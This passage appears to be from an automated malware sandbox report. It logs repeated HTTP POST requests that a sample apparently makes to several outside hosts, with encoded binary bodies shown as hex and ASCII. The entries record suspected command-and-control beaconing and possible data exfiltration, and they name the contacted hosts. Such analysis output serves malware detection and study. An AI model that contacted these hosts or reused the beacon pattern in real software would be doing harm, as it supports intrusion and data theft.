4e 4a 6b 78 51 6d 50 4b 42 77 68 35 35 50 44 33 2b 52 39 4f 35 69 34 57 75 62 52 50 61 4e 76 54 61 6a 38 44 36 74 59 4a 48 65 32 4c 77 32 72 30 54 77 35 53 7a 67 46 50 39 31 36 50 4a 48 2f 65 33 30 76 55 58 4f 73 5a 5a 39 50 67 66 32 45 7a 6b 64 30 4c 7a 43 51 68 64 36 50 77 5a 79 75 48 48 53 4e 32 4a 62 74 43 56 74 32 36 6b 46 6b 69 56 65 36 4e 67 64 74 4f 6c Data Ascii: BAXI4yvrt/34RuenAgasXZTepSzx7Eshj/es/5Xt3UPNiJ64tqHttvOn12i04gY5AFDPvDXswQ50eB/79w9gKTRh2b3frgIiVOixOgY260uL1BZ8NS4HdOlmMrEDtfJf7StTR5KrDfu9EfuzIDwEANjfX2ljtHGdHBnznh+nxVDSd98zzlYUR45W/r97glaj2awVt9whcQCS/BIhYQCsRj92OrP1s4unNdsUPUV9x5yeYDHrg+32NjBa9IOJf8oidXgS/KXv/3U++vVsCuj40oZY0xzaGxdXEPUjHBIe3u7zjMxk4zSl23I3lvYKrePiW5nfVYIILH41LMbghD5tzsjmNsopup3cbbgGmOOVe7WIAu9uJGBJSjUV3uoBgYcqGgKrcFzxNFUDth7ClMPR3ZJJBpi0y2V7o9/Mv55uEkEiLaeNJkxQmPKBwh55PD3+R9O5i4WubRPaNvTaj8D6tYJHe2Lw2r0Tw5SzgFP916PJH/e30vUXOsZZ9Pgf2Ezkd0LzCQhd6PwZyuHHSN2JbtCVt26kFkiVe6NgdtOl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 4c 4c 62 30 38 31 64 69 30 66 31 50 4f 30 55 37 52 70 75 2b 4a 36 42 61 36 57 6d 4e 38 56 45 2b 65 79 4e 74 36 50 41 66 39 76 30 79 71 2b 6a 2f 6a 39 63 72 74 36 4c 2b 6c 58 68 56 42 6a 38 71 35 6e 74 78 2b 62 76 2b 53 78 49 6e 4b 58 4d 6d 4e 33 69 76 56 32 70 47 4e 78 6b 50 6d 64 6d 2b 56 53 72 2b 57 44 56 6c 75 56 4b 54 6d 4e 32 38 38 61 79 6c 49 73 36 4a 64 45 2f 43 4d 49 31 78 58 4a 69 72 79 2f 37 4a 71 43 63 56 57 57 52 6b 41 57 43 65 59 68 61 6d 61 33 71 4a 46 62 45 47 37 4a 33 55 32 51 4d 6c 37 49 74 45 49 66 59 37 74 4e 2f 72 47 32 69 62 4d 39 2b 72 69 61 50 4b 65 2b 53 39 6d 4f 70 64 51 49 45 64 77 38 31 32 54 2b 53 42 44 2b 77 45 69 35 50 48 68 36 34 4e 35 61 7a 48 6b 65 37 64 70 63 6b 64 69 55 78 44 44 63 37 64 46 53 44 49 74 4d 6e 62 4c 74 62 42 67 47 31 37 69 67 39 4c 77 69 51 43 46 66 73 46 4d 48 79 67 79 54 4d 58 54 35 30 30 53 71 30 62 4f 6b 48 74 50 6c 6a 75 47 35 31 6a 59 69 77 68 49 38 64 42 39 33 59 74 73 6f 79 6c 52 33 32 41 73 34 50 31 74 33 51 79 75 6c 70 76 38 38 79 37 53 5a 54 44 30 33 43 71 56 4b 6e 36 2b 35 31 74 7a 2b 49 6e 56 7a 66 59 55 68 5a 65 44 59 71 5a 6a 75 47 72 41 6b 67 36 51 49 47 75 5a 33 53 48 7a 43 69 63 6b 77 31 44 6c 64 49 58 76 56 71 42 4a 2f 41 36 30 48 65 59 65 4f 6a 73 48 6e 51 42 66 4b 56 34 76 75 43 55 6f 46 6b 52 68 4f 56 74 2b 46 44 62 59 78 55 78 2b 54 70 45 5a 39 67 45 30 74 59 55 35 31 46 54 48 2f 55 2f 50 70 62 49 5a 2f 43 65 59 42 76 6a 50 63 38 69 48 78 4b 61 50 50 64 31 46 37 76 45 34 72 46 35 54 4d 4a 62 51 4d 6e 55 43 53 47 50 4a 35 54 4e 32 36 59 67 6b 71 64 7a 39 47 75 77 79 69 2b 46 51 4d 57 36 38 46 56 50 51 39 43 38 2b 52 33 74 49 54 52 34 59 73 2f 43 48 79 4c 51 46 35 35 50 55 54 4e 73 37 51 3d 3d Data Ascii: LLb081di0f1PO0U7Rpu+J6Ba6WmN8VE+eyNt6PAf9v0yq+j/j9crt6L+lXhVBj8q5ntx+bv+SxInKXMmN3ivV2pGNxkPmdm+VSr+WDVluVKTmN288aylIs6JdE/CMI1xXJiry/7JqCcVWWRkAWCeYhama3qJFbEG7J3U2QMl7ItEIfY7tN/rG2ibM9+riaPKe+S9mOpdQIEdw812T+SBD+wEi5PHh64N5azHke7dpckdiUxDDc7dFSDItMnbLtbBgG17ig9LwiQCFfsFMHygyTMXT500Sq0bOkHtPljuG51jYiwhI8dB93YtsoylR32As4P1t3Qyulpv88y7SZTD03CqVKn6+51tz+InVzfYUhZeDYqZjuGrAkg6QIGuZ3SHzCickw1DldIXvVqBJ/A60HeYeOjsHnQBfKV4vuCUoFkRhOVt+FDbYxUx+TpEZ9gE0tYU51FTH/U/PpbIZ/CeYBvjPc8iHxKaPPd1F7vE4rF5TMJbQMnUCSGPJ5TN26Ygkqdz9Guwyi+FQMW68FVPQ9C8+R3tITR4Ys/CHyLQF55PUTNs7Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 63 6e 4e 54 43 4f 5a 62 32 76 30 38 6c 66 39 37 67 55 4b 5a 47 67 6c 2b 7a 52 6e 47 42 78 47 49 65 6b 35 4a 41 69 49 78 67 30 50 73 51 73 39 39 79 63 2f 76 68 68 67 7a 49 4e 6f 50 50 30 32 51 33 45 50 58 55 75 72 69 61 56 6b 39 36 4c 35 75 6d 6d 54 78 57 4d 41 53 75 68 74 54 48 66 4a 4b 41 6c 44 36 50 6a 4a 6c 6f 2b 46 45 7a 34 79 74 33 34 79 70 67 72 32 61 65 4c 42 44 46 55 56 61 6e 79 4b 46 56 54 56 64 6f 34 43 44 73 65 73 79 36 75 51 76 47 51 34 4c 7a 79 58 59 59 30 44 7a 39 76 5a 43 65 38 78 69 55 47 64 65 32 38 55 57 6e 4a 4e 4a 78 75 73 51 64 7a 44 5a 56 75 56 48 7a 53 7a 64 4e 61 36 38 2f 75 77 44 69 6d 55 45 47 77 31 41 6d 69 50 62 67 42 48 75 4a 46 43 31 58 38 39 39 6e 41 6f 78 37 68 6e 6a 36 46 49 35 64 75 55 6b 4e 52 63 58 2f 41 4f 4c 64 5a 36 34 6e 54 4d 67 31 34 31 72 4a 41 4f 44 5a 54 42 54 69 6f 4f 69 2f 34 61 47 70 74 4f 69 6d 68 48 2f 75 46 6c 4f 47 6a 42 42 30 4b 76 69 55 39 32 67 33 37 6a 47 49 43 59 45 62 2f 43 49 39 70 78 61 4a 2b 43 69 4a 6a 72 36 4a 4a 41 2f 51 37 45 52 30 42 45 6b 79 4d 54 74 30 63 69 4c 71 48 58 6b 39 33 73 69 38 4c 63 64 4e 50 4e 37 45 43 34 58 34 6d 6e 79 78 4c 57 67 34 32 52 4a 57 4a 43 41 67 47 75 62 45 71 58 59 63 65 49 2b 54 65 71 44 46 54 64 75 67 6c 76 69 5a 34 78 52 35 39 4b 4f 39 6f 7a 38 4f 30 49 2b 38 35 69 64 52 67 66 69 73 64 4c 6e 71 35 41 68 36 76 46 72 4c 49 2b 62 34 48 52 4a 41 78 42 45 51 49 52 59 66 35 72 42 45 78 2f 53 6a 73 6d 48 6c 6e 58 39 79 59 33 2b 50 4e 44 4f 51 4b 38 72 47 54 48 63 68 39 38 4e 5a 4f 33 2f 6a 36 30 76 62 61 63 59 43 55 57 4f 6b 78 47 58 31 47 67 34 4f 73 4e 6c 42 64 4e 64 45 31 42 6a 30 43 69 41 38 48 66 32 6c 39 31 6f 55 2b 79 6e 2b 54 2b 72 78 51 47 35 2f 56 47 59 63 4f 76 63 74 74 4b 45 7a 54 32 54 4e 46 6a 74 2f 41 57 63 69 49 55 3d Data Ascii: cnNTCOZb2v08lf97gUKZGgl+zRnGBxGIek5JAiIxg0PsQs99yc/vhhgzINoPP02Q3EPXUuriaVk96L5ummTxWMASuhtTHfJKAlD6PjJlo+FEz4yt34ypgr2aeLBDFUVanyKFVTVdo4CDsesy6uQvGQ4LzyXYY0Dz9vZCe8xiUGde28UWnJNJxusQdzDZVuVHzSzdNa68/uwDimUEGw1AmiPbgBHuJFC1X899nAox7hnj6FI5duUkNRcX/AOLdZ64nTMg141rJAODZTBTioOi/4aGptOimhH/uFlOGjBB0KviU92g37jGICYEb/CI9pxaJ+CiJjr6JJA/Q7ER0BEkyMTt0ciLqHXk93si8LcdNPN7EC4X4mnyxLWg42RJWJCAgGubEqXYceI+TeqDFTduglviZ4xR59KO9oz8O0I+85idRgfisdLnq5Ah6vFrLI+b4HRJAxBEQIRYf5rBEx/SjsmHlnX9yY3+PNDOQK8rGTHch98NZO3/j60vbacYCUWOkxGX1Gg4OsNlBdNdE1Bj0CiA8Hf2l91oU+yn+T+rxQG5/VGYcOvcttKEzT2TNFjt/AWciIU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 44 64 79 49 6a 5a 48 2f 35 76 30 6d 78 57 76 35 4d 4c 4d 6d 49 4f 72 35 58 74 64 50 43 4a 53 65 56 55 2f 30 7a 77 48 44 66 73 69 41 44 4e 50 64 72 73 58 36 79 56 6d 44 50 2f 47 6f 6d 74 49 43 49 73 67 78 62 49 39 6a 67 38 48 53 34 4f 6f 71 70 30 35 56 7a 41 63 50 37 58 2f 55 6c 79 6f 2f 31 61 4c 57 43 5a 50 32 6c 76 41 62 55 44 38 63 78 67 64 6d 56 49 56 4e 31 34 73 59 66 50 39 2f 31 35 52 52 71 50 32 41 73 2f 41 70 6f 6c 46 6d 37 64 44 31 6c 57 77 75 36 67 51 45 4e 36 58 6d 43 53 6f 62 4e 69 33 47 6f 41 63 49 30 51 70 71 63 6a 44 31 4b 73 47 6e 30 38 62 35 36 68 47 2f 42 6e 71 36 34 6b 46 48 68 39 5a 49 74 44 45 6d 77 4b 50 64 6a 6f 62 52 55 64 41 4c 55 53 70 65 67 70 59 74 73 72 35 6b 72 53 68 2b 31 71 68 32 52 79 66 4f 6a 6e 71 76 33 75 6f 4f 73 6a 74 6d 72 38 6f 4d 71 7a 64 30 4b 49 7a 34 70 34 4f 4e 48 72 56 55 2b 78 39 32 54 66 44 75 74 65 35 67 43 53 43 52 2b 33 59 4f 7a 34 49 4a 4d 4e 6c 73 78 65 63 50 31 44 35 6c 2b 48 48 6c 36 44 46 6a 75 59 65 6f 36 66 4a 66 6c 44 78 41 63 56 34 34 4c 64 71 47 77 73 41 6e 42 46 51 4d 69 72 30 69 36 6e 77 4b 61 30 54 49 4f 43 73 6d 66 42 38 48 42 55 7a 39 46 2f 2b 7a 6b 61 52 67 78 39 57 31 36 6a 2f 67 43 7a 32 35 4b 75 48 45 37 4e 36 74 4e 37 52 42 79 33 56 66 32 5a 43 47 51 4a 71 36 6c 78 4c 4f 44 4d 74 41 49 4b 54 44 57 6b 6c 55 6f 56 6c 6a 49 64 77 6e 32 75 57 68 34 49 2b 4d 51 75 36 43 61 50 46 4a 6e 63 78 39 33 53 51 68 48 37 2b 6d 46 4d 57 4b 36 31 71 7a 65 34 46 6a 56 45 55 51 2b 42 35 6f 58 66 42 57 61 6f 75 7a 52 64 44 36 42 7a 4c 32 4d 32 69 4a 44 51 32 79 61 34 4d 7a 69 46 76 45 54 78 58 30 4c 46 51 32 Data Ascii: DdyIjZH/5v0mxWv5MLMmIOr5XtdPCJSeVU/0zwHDfsiADNPdrsX6yVmDP/GomtICIsgxbI9jg8HS4Ooqp05VzAcP7X/Ulyo/1aLWCZP2lvAbUD8cxgdmVIVN14sYfP9/15RRqP2As/ApolFm7dD1lWwu6gQEN6XmCSobNi3GoAcI0QpqcjD1KsGn08b56hG/Bnq64kFHh9ZItDEmwKPdjobRUdALUSpegpYtsr5krSh+1qh2RyfOjnqv3uoOsjtmr8oMqzd0KIz4p4ONHrVU+x92TfDute5gCSCR+3YOz4IJMNlsxecP1D5l+HHl6DFjuYeo6fJflDxAcV44LdqGwsAnBFQMir0i6nwKa0TIOCsmfB8HBUz9F/+zkaRgx9W16j/gCz25KuHE7N6tN7RBy3Vf2ZCGQJq6lxLODMtAIKTDWklUoVljIdwn2uWh4I+MQu6CaPFJncx93SQhH7+mFMWK61qze4FjVEUQ+B5oXfBWaouzRdD6BzL2M2iJDQ2ya4MziFvETxX0LFQ2
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 79 4d 46 61 6a 6d 41 47 35 2f 33 67 44 43 4b 51 73 34 59 55 7a 5a 50 63 48 66 44 49 42 4f 4d 51 6c 43 76 30 56 41 46 4f 74 43 30 5a 78 61 46 57 45 2b 4f 53 55 39 55 33 69 36 39 5a 6d 54 77 4b 64 50 7a 2f 73 6c 70 41 46 71 61 2b 63 57 4f 4d 72 4c 73 45 46 66 75 47 44 36 44 41 61 34 4c 47 6f 74 62 65 30 73 72 52 61 71 32 4a 6f 72 69 79 33 78 63 36 42 30 76 32 4a 44 4b 6d 33 48 59 55 6f 33 37 4f 32 4c 5a 72 41 56 2f 34 72 59 41 64 54 58 66 4e 6f 31 41 75 31 71 39 41 72 35 6f 6a 31 74 69 50 61 32 51 76 78 6c 4a 6d 75 30 73 44 59 6f 48 69 59 43 74 4f 2f 56 62 50 32 79 76 6f 4a 44 4d 51 33 67 78 32 49 4f 7a 38 35 76 49 4b 48 4f 4c 47 73 47 42 71 44 71 65 78 47 70 33 69 71 63 45 45 54 35 4d 53 54 49 6a 71 54 52 52 57 79 53 77 52 35 69 62 72 7a 44 4b 43 58 69 51 6a 6d 75 35 46 50 51 4f 4a 58 41 4d 6b 4e 36 43 48 4e 50 39 41 44 4f 51 69 36 54 36 67 67 7a 44 45 76 46 53 2f 71 7a 6f 75 59 70 4d 4f 57 41 79 4c 4f 2f 44 52 79 74 6a 77 51 49 55 33 33 2b 75 64 55 32 31 4f 39 6a 47 53 39 55 30 6e 70 31 59 4b 6c 43 2f 63 56 42 55 6d 57 63 6f 62 78 6e 45 36 4b 67 46 2f 78 41 57 74 71 4d 76 52 64 2f 76 4d 34 78 47 67 32 78 59 44 79 63 41 63 49 38 69 2b 71 74 38 4d 76 34 59 68 77 57 4c 2f 33 75 71 4d 36 2f 2b 39 34 73 56 52 33 54 59 69 67 54 46 2b 47 56 46 74 76 68 73 77 65 38 64 30 59 61 64 51 6d 35 4d 39 48 34 4f 50 4f 54 43 51 77 4a 45 31 62 47 6b 73 30 74 6f 39 37 71 75 68 59 6c 61 6a 4d 61 45 48 70 56 61 56 6b 6a 35 45 66 49 4c 42 5a 41 70 44 65 71 30 73 33 65 66 4c 79 4d 66 48 78 30 69 2b 79 4e 76 32 75 55 65 78 56 71 44 37 77 64 65 57 58 48 2f 57 33 41 32 4a 32 36 38 58 65 55 48 4d 73 54 6a 52 Data Ascii: yMFajmAG5/3gDCKQs4YUzZPcHfDIBOMQlCv0VAFOtC0ZxaFWE+OSU9U3i69ZmTwKdPz/slpAFqa+cWOMrLsEFfuGD6DAa4LGotbe0srRaq2Joriy3xc6B0v2JDKm3HYUo37O2LZrAV/4rYAdTXfNo1Au1q9Ar5oj1tiPa2QvxlJmu0sDYoHiYCtO/VbP2yvoJDMQ3gx2IOz85vIKHOLGsGBqDqexGp3iqcEET5MSTIjqTRRWySwR5ibrzDKCXiQjmu5FPQOJXAMkN6CHNP9ADOQi6T6ggzDEvFS/qzouYpMOWAyLO/DRytjwQIU33+udU21O9jGS9U0np1YKlC/cVBUmWcobxnE6KgF/xAWtqMvRd/vM4xGg2xYDycAcI8i+qt8Mv4YhwWL/3uqM6/+94sVR3TYigTF+GVFtvhswe8d0YadQm5M9H4OPOTCQwJE1bGks0to97quhYlajMaEHpVaVkj5EfILBZApDeq0s3efLyMfHx0i+yNv2uUexVqD7wdeWXH/W3A2J268XeUHMsTjR
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 42 56 46 38 6a 6e 67 48 35 2f 33 48 52 58 69 37 2b 79 54 63 36 47 73 31 77 31 58 41 6c 38 62 49 4c 48 4a 4a 73 70 71 48 5a 33 76 52 67 73 54 75 4e 48 5a 48 61 4e 59 43 51 6e 58 35 77 48 4e 73 54 76 53 4d 72 68 4a 36 78 77 74 52 30 75 5a 6a 62 6e 6b 57 6b 68 46 71 7a 70 76 76 6b 35 75 61 4a 32 63 59 37 4e 61 69 6e 77 47 45 75 42 6e 7a 46 63 34 68 77 51 33 6f 6c 47 70 73 65 36 6d 77 71 39 4c 30 35 4a 64 6d 59 30 6a 38 4a 4a 66 79 2f 62 78 33 58 6b 55 4d 65 6d 78 4f 51 38 44 2b 72 67 75 64 6b 36 43 31 58 6d 67 35 53 74 57 38 6d 44 76 54 38 7a 6f 76 6d 39 57 32 67 46 4d 44 46 48 45 31 49 66 56 6a 5a 59 69 7a 5a 4d 58 36 6c 58 6f 33 51 6c 34 56 4b 7a 74 66 5a 42 38 72 54 45 41 4c 72 62 61 4a 47 4a 36 46 51 76 55 4f 72 51 66 55 76 54 79 4c 6b 69 62 44 2b 66 59 47 57 65 32 31 41 66 4f 44 62 78 35 75 53 69 41 46 69 30 52 6e 31 39 71 54 5a 31 6e 52 76 36 67 65 41 78 66 75 75 50 4f 56 39 37 55 74 70 65 67 4c 4f 43 75 6a 4e 4e 50 63 36 35 6e 76 51 2b 53 6a 78 6a 42 4a 55 46 7a 68 7a 30 69 39 2b 62 37 6b 69 54 49 5a 59 6c 2b 4f 2f 2b 34 72 59 51 54 57 45 31 36 6e 30 32 68 52 77 4d 47 7a 51 79 75 36 55 7a 6d 4b 4d 71 34 55 68 64 2f 78 44 73 71 56 50 31 68 44 4e 66 34 68 72 4a 42 50 6e 57 55 59 59 6c 2f 68 6d 55 49 32 77 67 6d 7a 6b 30 6b 74 52 67 67 63 56 50 72 6d 7a 2b 42 47 74 55 63 5a 50 61 6f 67 6b 38 78 72 64 53 48 2f 38 4f 74 6f 4d 50 53 4e 31 6b 30 4a 6e 35 4e 77 75 52 46 75 44 45 76 42 31 57 46 41 44 33 4a 50 36 43 51 76 4a 44 67 38 67 67 48 67 4a 74 6b 30 73 56 55 62 69 34 69 37 36 4b 49 42 69 6b 69 79 74 39 4a 4f 6e 74 71 56 51 52 68 71 48 48 57 69 6b 61 6b 57 76 77 42 2f 73 31 73 52 75 48 5a 4d 41 47 2b 51 49 74 71 5a 52 33 64 72 6a 33 7a 54 48 4d 6c 67 2f 68 55 43 69 38 4b 61 76 57 6d 6e 57 33 41 6a Data Ascii: BVF8jngH5/3HRXi7+yTc6Gs1w1XAl8bILHJJspqHZ3vRgsTuNHZHaNYCQnX5wHNsTvSMrhJ6xwtR0uZjbnkWkhFqzpvvk5uaJ2cY7NainwGEuBnzFc4hwQ3olGpse6mwq9L05JdmY0j8JJfy/bx3XkUMemxOQ8D+rgudk6C1Xmg5StW8mDvT8zovm9W2gFMDFHE1IfVjZYizZMX6lXo3Ql4VKztfZB8rTEALrbaJGJ6FQvUOrQfUvTyLkibD+fYGWe21AfODbx5uSiAFi0Rn19qTZ1nRv6geAxfuuPOV97UtpegLOCujNNPc65nvQ+SjxjBJUFzhz0i9+b7kiTIZYl+O/+4rYQTWE16n02hRwMGzQyu6UzmKMq4Uhd/xDsqVP1hDNf4hrJBPnWUYYl/hmUI2wgmzk0ktRggcVPrmz+BGtUcZPaogk8xrdSH/8OtoMPSN1k0Jn5NwuRFuDEvB1WFAD3JP6CQvJDg8ggHgJtk0sVUbi4i76KIBikiyt9JOntqVQRhqHHWikakWvwB/s1sRuHZMAG+QItqZR3drj3zTHMlg/hUCi8KavWmnW3Aj
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 4c 4c 62 30 38 31 64 69 30 66 31 50 4f 30 55 37 52 70 75 2b 4a 36 42 61 36 57 6d 4e 38 56 45 2b 65 79 4e 74 36 50 41 66 39 76 30 79 71 2b 6a 2f 6a 39 63 72 74 36 4c 2b 6c 58 68 56 42 6a 38 71 35 6e 74 78 2b 62 76 2b 53 78 49 6e 4b 58 4d 6d 4e 33 69 76 56 32 70 47 4e 78 6b 50 6d 64 6d 2b 56 53 72 2b 57 44 56 6c 75 56 4b 54 6d 4e 32 38 38 61 79 6c 49 73 36 4a 64 45 2f 43 4d 49 31 78 58 4a 69 72 79 2f 37 4a 71 43 63 56 57 57 52 6b 41 57 43 65 59 68 61 6d 61 33 71 4a 46 62 45 47 37 4a 33 55 32 51 4d 6c 37 49 74 45 49 66 59 37 74 4e 2f 72 47 32 69 62 4d 39 2b 72 69 61 50 4b 65 2b 53 39 6d 4f 70 64 51 49 45 64 77 38 31 32 54 2b 53 42 44 2b 77 45 69 35 50 48 68 36 34 4e 35 61 7a 48 6b 65 37 64 70 63 6b 64 69 55 78 44 44 63 37 64 46 53 44 49 74 4d 6e 62 4c 74 62 42 67 47 31 37 69 67 39 4c 77 69 51 43 46 66 73 46 4d 48 79 67 79 54 4d 58 54 35 30 30 53 71 30 62 4f 6b 48 74 50 6c 6a 75 47 35 31 6a 59 69 77 68 49 38 64 42 39 33 59 74 73 6f 79 6c 52 33 32 41 73 34 50 31 74 33 51 79 75 6c 70 76 38 38 79 37 53 5a 54 44 30 33 43 71 56 4b 6e 36 2b 35 31 74 7a 2b 49 6e 56 7a 66 59 55 68 5a 65 44 59 71 5a 6a 75 47 72 41 6b 67 36 51 49 47 75 5a 33 53 48 7a 43 69 63 6b 77 31 44 6c 64 49 58 76 56 71 42 4a 2f 41 36 30 48 65 59 65 4f 6a 73 48 6e 51 42 66 4b 56 34 76 75 43 55 6f 46 6b 52 68 4f 56 74 2b 46 44 62 59 78 55 78 2b 54 70 45 5a 39 67 45 30 74 59 55 35 31 46 54 48 2f 55 2f 50 70 62 49 5a 2f 43 65 59 42 76 6a 50 63 38 69 48 78 4b 61 50 50 64 31 46 37 76 45 34 72 46 35 54 4d 4a 62 51 4d 6e 55 43 53 47 50 4a 35 54 4e 32 36 59 67 6b 71 64 7a 39 47 75 77 79 69 2b 46 51 4d 57 36 38 46 56 50 51 39 43 38 2b 52 33 74 49 54 52 34 59 73 2f 43 48 79 4c 51 46 35 35 50 55 54 4e 73 37 51 3d 3d Data Ascii: LLb081di0f1PO0U7Rpu+J6Ba6WmN8VE+eyNt6PAf9v0yq+j/j9crt6L+lXhVBj8q5ntx+bv+SxInKXMmN3ivV2pGNxkPmdm+VSr+WDVluVKTmN288aylIs6JdE/CMI1xXJiry/7JqCcVWWRkAWCeYhama3qJFbEG7J3U2QMl7ItEIfY7tN/rG2ibM9+riaPKe+S9mOpdQIEdw812T+SBD+wEi5PHh64N5azHke7dpckdiUxDDc7dFSDItMnbLtbBgG17ig9LwiQCFfsFMHygyTMXT500Sq0bOkHtPljuG51jYiwhI8dB93YtsoylR32As4P1t3Qyulpv88y7SZTD03CqVKn6+51tz+InVzfYUhZeDYqZjuGrAkg6QIGuZ3SHzCickw1DldIXvVqBJ/A60HeYeOjsHnQBfKV4vuCUoFkRhOVt+FDbYxUx+TpEZ9gE0tYU51FTH/U/PpbIZ/CeYBvjPc8iHxKaPPd1F7vE4rF5TMJbQMnUCSGPJ5TN26Ygkqdz9Guwyi+FQMW68FVPQ9C8+R3tITR4Ys/CHyLQF55PUTNs7Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4c 35 61 62 50 7a 33 58 30 2f 31 76 59 69 45 38 39 43 2f 6f 6a 48 59 75 32 34 6c 72 39 2b 62 6e 77 65 4d 44 65 41 44 78 4b 31 55 63 2f 64 6b 33 75 34 49 4a 62 72 75 42 30 62 6f 66 74 77 6c 2b 72 6b 4e 39 6f 4d 2b 58 4b 46 4d 30 54 39 43 6d 7a 31 34 56 45 65 72 52 72 57 45 32 63 2b 68 77 4a 41 73 79 64 31 6a 4e 69 70 39 41 34 70 57 6a 34 57 55 52 68 66 45 6a 58 32 4b 44 77 46 41 68 4e 4d 71 36 71 74 2f 51 58 35 56 61 56 32 51 46 31 4b 32 4a 7a 67 74 7a 4f 6f 5a 62 59 74 64 41 69 2b 63 6f 42 2f 6c 47 58 4b 55 43 52 4f 44 39 74 4c 64 70 51 76 78 46 4b 66 39 72 77 42 53 75 59 4b 6a 44 34 51 32 74 39 34 71 48 50 5a 6b 46 35 57 35 72 37 6e 54 51 70 72 50 2f 43 33 4c 6a 61 30 61 6e 51 78 64 32 55 45 4f 58 48 74 4a 55 77 42 31 67 62 4e 51 51 44 58 59 48 68 56 58 2b 53 67 41 47 42 36 4d 63 36 7a 74 42 6f 76 51 4f 4c 66 45 43 2f 42 32 30 42 4a 59 72 75 2f 56 56 57 72 74 77 6d 6e 46 50 32 72 4f 6c 6e 44 63 77 33 4d 72 4f 4d 6a 34 53 6b 32 68 65 2f 75 7a 50 69 46 64 43 4c 39 79 42 43 75 73 6f 4a 78 6c 44 41 55 6b 6c 47 36 68 33 75 39 58 31 41 72 6e 64 41 54 4a 64 4d 2b 61 44 78 44 6d 64 6d 78 43 38 77 36 51 70 34 33 4e 66 69 52 65 54 43 70 6b 39 73 45 62 6a 71 43 4e 36 4f 59 70 74 57 5a 4c 48 39 32 52 6f 67 58 74 77 43 6e 43 6e 61 57 4a 45 55 32 59 32 35 64 41 38 6a 79 76 74 4c 70 6e 39 2b 2b 33 37 5a 51 6c 50 79 52 6b 6d 30 6b 79 58 2f 43 33 4f 73 4d 48 4b 30 34 53 30 52 30 64 78 6e 65 65 47 4e 67 6a 72 59 4b 45 69 76 44 73 57 61 37 52 2f 48 55 5a 4b 64 61 69 49 30 52 35 79 66 61 37 70 32 71 36 46 43 46 43 43 44 52 69 62 4a 30 61 35 6e 2f 56 7a 77 55 64 39 75 66 73 6a 42 44 57 35 71 65 46 6e 4f 55 4c 58 76 35 58 31 4b 2b 4f 46 4f 43 59 39 2f 36 4b 4c 33 79 5a 6f 56 51 36 53 7a 69 4e 51 Data Ascii: L5abPz3X0/1vYiE89C/ojHYu24lr9+bnweMDeADxK1Uc/dk3u4IJbruB0boftwl+rkN9oM+XKFM0T9Cmz14VEerRrWE2c+hwJAsyd1jNip9A4pWj4WURhfEjX2KDwFAhNMq6qt/QX5VaV2QF1K2JzgtzOoZbYtdAi+coB/lGXKUCROD9tLdpQvxFKf9rwBSuYKjD4Q2t94qHPZkF5W5r7nTQprP/C3Lja0anQxd2UEOXHtJUwB1gbNQQDXYHhVX+SgAGB6Mc6ztBovQOLfEC/B20BJYru/VVWrtwmnFP2rOlnDcw3MrOMj4Sk2he/uzPiFdCL9yBCusoJxlDAUklG6h3u9X1ArndATJdM+aDxDmdmxC8w6Qp43NfiReTCpk9sEbjqCN6OYptWZLH92RogXtwCnCnaWJEU2Y25dA8jyvtLpn9++37ZQlPyRkm0kyX/C3OsMHK04S0R0dxneeGNgjrYKEivDsWa7R/HUZKdaiI0R5yfa7p2q6FCFCCDRibJ0a5n/VzwUd9ufsjBDW5qeFnOULXv5X1K+OFOCY9/6KL3yZoVQ6SziNQ
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 6b 4d 71 4e 6a 62 6e 2f 35 76 33 73 70 4a 43 61 53 4b 55 65 4a 46 4a 30 4c 58 69 58 62 2f 34 42 2f 62 30 42 53 30 67 77 38 55 41 76 39 45 6b 34 31 74 30 65 69 4a 57 48 62 68 47 32 71 47 6c 6f 33 4d 4f 76 59 63 69 34 64 72 6e 32 4e 75 37 68 42 2b 50 6d 74 2b 75 6b 65 6b 75 4e 35 43 68 48 4f 55 66 56 61 61 2f 4c 61 4e 6b 2b 64 69 6d 46 37 63 4f 63 49 64 44 33 49 70 73 72 6f 5a 55 6f 2f 46 49 71 44 66 46 50 44 53 47 6b 53 48 64 59 34 61 44 6b 43 44 30 74 42 57 6c 41 2b 30 46 37 31 70 4f 47 62 52 43 43 4d 74 67 70 6a 48 42 6c 51 49 67 76 78 68 35 45 50 34 56 47 36 49 66 53 38 46 33 6d 68 52 47 63 4f 31 46 71 50 4d 61 39 47 4d 4d 53 4d 57 58 38 6a 63 76 62 78 70 59 76 52 30 4c 46 67 59 76 59 50 4c 42 78 64 77 